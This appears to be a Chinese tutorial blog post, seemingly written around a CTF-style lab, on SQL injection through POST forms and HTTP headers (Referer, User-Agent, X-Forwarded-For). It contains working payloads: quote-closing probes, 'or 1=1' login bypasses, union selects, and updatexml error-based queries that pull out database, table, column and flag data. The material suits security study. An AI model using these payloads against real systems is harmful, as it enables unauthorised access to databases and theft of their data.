POST注入与Head注入

本文详细介绍了SQL注入中的POST注入与Head注入技术,包括如何通过不同的HTTP请求方法寻找和利用潜在的SQL注入漏洞,如使用闭合符号触发异常、万能密码尝试、以及利用updatexml函数等高级技巧。

POST注入与Head注入

POST注入

post注入与get注入的区别在于表单的传递方式,无本质差别

get传参通过url编码,使用?来标识,数据量有限

post注入一般对输入框进行传参,数据量比较大

  1. 查询是否有注入点

    对输入框填入一些闭合的符号,看页面是否异常
    例如: ’ " ') ")

  2. 尝试使用万能密码

    admin或123465或 ’ or 1=1 #

  3. post注入

    ' or 1=1 order by 1
    ' or 1=2 union select 1,2,3#
    

    接下来的步骤与get注入类似

Head注入

  1. 报错注入原理

    登录成功后通过brup抓包,将标记字段中的内容替换为updatexml函数,通过sql报错来显示我们要查询的内容

在这里插入图片描述

​ updatexml() 更新xml文档的函数

在这里插入图片描述
在这里插入图片描述

#号前闭合,后注释

在这里插入图片描述

用and的时候,前面的错了,则后面的不执行;前面的对了,则后面的执行;
用or的时候,前面的对了,则后面的不执行;前面的错了,则后面的执行;

sql语句在concat中可以被执行,16进制也能自动转义 0x7e为~符号 在upxml函数中加入特殊符号使其报错

可能的注入点 referer: user-agent: x-forwarded-for

  1. 登录成功后抓包

在这里插入图片描述

由此判断存在head注入,并且insert into 可能有两个字段

  1. 通过updatexml函数获取库名

    updatexml(123,concat('~',(select database())),123)
    'or updatexml(1,concat(0x7e,(select database())),1),1)#
    

在这里插入图片描述

  1. 查询表名

    ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=database())),1),1) #
    
  2. 查询字段名

    ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag_head’)),1),1) #
    
  3. 查询数据拿到flag

    ' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #
    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值